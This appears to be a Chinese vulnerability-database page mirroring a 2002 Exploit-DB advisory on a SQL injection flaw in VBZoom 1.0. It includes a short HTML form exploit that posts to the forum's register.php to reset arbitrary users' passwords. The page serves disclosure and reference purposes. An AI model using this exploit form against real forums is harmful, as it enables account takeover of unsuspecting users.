VBZoom 1.0 – SQL Injection

35次阅读
没有评论

VBZoom 1.0 – SQL Injection

漏洞ID 1053628 漏洞类型
发布时间 2002-10-08 更新时间 2002-10-08
VBZoom 1.0 - SQL InjectionCVE编号 N/A
VBZoom 1.0 - SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21918
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5919/info

A SQL injection vulnerability has been discovered in VBZoom v1.01.

Due to insufficient sanitization of variables used to construct SQL queries, it is possible to modify the logic of a query, via a malicious request.

Exploiting this issue could allow an attacker to reset the password of an arbitrary forum user. The ability to impersonate arbitrary users could potentially allow an attacker to launch further attacks against the vulnerable server.

Other SQL injection attacks may also be possible.


Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php"
method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>

相关推荐: ssh密码提示漏洞

ssh密码提示漏洞 漏洞ID 1207024 漏洞类型 未知 发布时间 1999-06-09 更新时间 1999-06-09 CVE编号 CVE-1999-1231 CNNVD-ID CNNVD-199906-014 漏洞平台 N/A CVSS评分 5.0 |…

正文完
 0